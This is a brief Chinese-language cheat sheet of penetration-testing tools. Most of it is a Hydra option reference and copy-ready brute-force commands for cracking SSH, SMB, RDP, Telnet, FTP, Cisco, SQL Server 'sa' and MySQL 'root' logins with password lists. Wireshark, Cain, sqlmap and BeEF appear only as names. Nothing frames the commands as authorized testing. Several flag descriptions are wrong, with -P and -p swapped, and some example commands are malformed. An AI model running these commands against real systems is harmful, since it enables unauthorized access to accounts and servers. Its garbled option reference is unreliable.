网络监听：

wireshark

cain

密码爆破：

hydra

参数详解：

-R　　根据上一次进度继续破解
-S　　使用SSL协议连接
-s　　指定端口
-l　　 指定用户名
-L　　指定用户名字典（文件）
-P　　指定密码破解
-p　　指定密码字典（文件）
-e　　空密码探测和指定用户密码探测（ns）
-C　　用户名可以用:分割（username:password）可以代替 -l  username　　-p  password
-o　　输出文件
-t　　指定多线程数量，默认为16个线程
-vV　　显示详细过程
server　　目标IP
service　　指定服务名（telnet、ftp、http、mysql、ssh）

 使用案例：

破解ssh：
hydra  -L  user.txt　　-P  password.txt　　-vV  -o  ssh.log　　-e  ns   IP    ssh
破解smb:
hydra  -l  administrator　-P  password.txt    IP    smb
破解rdp:
hydra   IP   rdp   -l   administrator    -P   password.txt   -V
破解telnet：
hydra   IP   telnet   -l  administrator  -P  password.txt    -t   32   -s  23   -e  ns  -f   -V
破解ftp:
hydra   ftp   IP    -l  administrator  -P  password.txt   -t (默认16线程)   -vV
hydra   ftp   IP    -l  administrator  -P  password.txt  -e   ns   -vV
破解Cisco：
hydra   -P  password.txt    IP  cisco
hydra  -m  cloud   -P  password.txt    10.58.26.98  cisco-enable
破解sqlserver密码：
hydra.exe  -l  sa　　-P  c:\password.txt　　192.168.25.26  mssql
破解mysql密码：
hydra.exe  -l  root　　-P  c:\password.txt　　192.168.25.26  mysql

sqlmap

beef